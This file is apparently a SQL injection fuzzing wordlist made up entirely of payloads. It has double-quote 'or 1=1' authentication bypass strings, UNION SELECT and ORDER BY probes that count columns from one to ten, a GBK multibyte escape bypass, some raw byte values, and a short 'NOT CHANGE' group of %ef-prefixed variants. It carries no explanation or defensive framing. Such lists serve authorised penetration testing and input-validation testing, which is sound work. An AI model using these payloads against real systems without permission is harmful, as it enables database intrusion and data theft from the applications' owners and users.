" or true -- -
" or (true) -- -
" or 1=1 -- -
" or (1=1) -- -
" UNION SELECT NULL -- -
" UNION SELECT NULL, NULL -- -
" UNION SELECT NULL, NULL, NULL -- -
" UNION SELECT NULL, NULL, NULL, NULL -- -
" UNION SELECT NULL, NULL, NULL, NULL, NULL -- -
" ORDER BY 1 -- -
" UNION SELECT 1 -- -
" UNION SELECT NULL -- -
" ORDER BY 2 -- -
" UNION SELECT 1,2 -- -
" UNION SELECT NULL,NULL -- -
" ORDER BY 3 -- -
" UNION SELECT 1,2,3 -- -
" UNION SELECT NULL,NULL,NULL -- -
" ORDER BY 4 -- -
" UNION SELECT 1,2,3,4 -- -
" UNION SELECT NULL,NULL,NULL,NULL -- -
" ORDER BY 5 -- -
" UNION SELECT 1,2,3,4,5 -- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL -- -
" ORDER BY 6 -- -
" UNION SELECT 1,2,3,4,5,6 -- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL -- -
" ORDER BY 7 -- -
" UNION SELECT 1,2,3,4,5,6,7 -- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -
" ORDER BY 8 -- -
" UNION SELECT 1,2,3,4,5,6,7,8 -- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -
" ORDER BY 9 -- -
" UNION SELECT 1,2,3,4,5,6,7,8,9 -- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -
" ORDER BY 10 -- -
" UNION SELECT 1,2,3,4,5,6,7,8,9,10 -- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -
\xbf\x27 OR 1=1 /*
\x00
\xff
11111111
\x7
01111111
\x80
00101010
\x2c



NOT CHANGE:
1 or 1=1
%ef" or 1=1 -- +
%ef' or 1=1 -- +